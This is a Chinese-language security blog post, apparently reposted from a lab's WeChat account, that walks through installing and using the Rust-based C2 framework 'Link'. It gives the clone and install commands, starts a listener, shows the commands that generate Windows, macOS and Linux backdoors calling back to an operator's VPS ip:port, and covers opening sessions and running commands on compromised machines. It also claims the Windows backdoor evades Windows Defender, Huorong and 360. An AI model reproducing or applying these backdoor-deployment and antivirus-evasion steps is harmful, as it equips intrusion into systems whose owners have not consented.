一款小巧的c2上线工具

admin 2022年3月9日18:19:47评论260 views字数 1178阅读3分55秒阅读模式

一款小巧的c2上线工具

破军安全实验室

忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等

本文约1150字,阅读约需3分钟。

0x00 前言

Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。
功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具。
https://github.com/postrequest/link

0x01 安装

命令如下

git clonehttps://github.com/postrequest/linkcd link/./kali-install.sh

执⾏后
会出现这个⻚⾯后,三个选项分别是:
1、继续安装(默认安装)2、⾃定义安装3、取消安装

一款小巧的c2上线工具



这⾥选择 1 默认安装即可
安装过程较为漫⻓,需要等待下⾯进度条结束:

 

一款小巧的c2上线工具


结束后后直接重启,因为 rust 安装完后需要重启⽣效 :

一款小巧的c2上线工具

重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:


./target/release/link

启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :

一款小巧的c2上线工具

然后进⼊到link的管理模式下:

一款小巧的c2上线工具

主要⽤到前三条在 Windows, MacOS , Linux 中⽣成载荷:(目前Windows后门和linux载荷测试成功上线,苹果载荷暂未测试。)

generate vps-ip:port //⽣成windows 后⻔generate-osx vps-ip:port //⽣成苹果载荷generate-linux vps-ip:port //⽣成 linux 载荷

0x02 Windows 上线:

⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):

一款小巧的c2上线工具

成功生成windows后门文件:

一款小巧的c2上线工具

运⾏link.exe 后上线:
查看当前会话:links ,类似MSF的Sessions

一款小巧的c2上线工具

进⼊到当前会话 links -i 会话ID :
进⼊到当前会话中后 可以执⾏命令 whoami

一款小巧的c2上线工具

0x03 Linux上线:

⽣成后⻔:

一款小巧的c2上线工具

然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:

一款小巧的c2上线工具


一款小巧的c2上线工具

 

执⾏命令:

shell linux命令:

一款小巧的c2上线工具

0x04 ByPass

通过测试发现,Windows Defender、⽕绒、 360 动态、静态都可过:

一款小巧的c2上线工具

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,破军安全实验室及文章作者不为此承担任何责任。

破军安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经破军安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

一款小巧的c2上线工具

破军安全实验室

# 长按二维码 关注我们 #

原文始发于微信公众号(破军安全实验室):一款小巧的c2上线工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月9日18:19:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一款小巧的c2上线工具http://cn-sec.com/archives/824287.html

发表评论

匿名网友 填写信息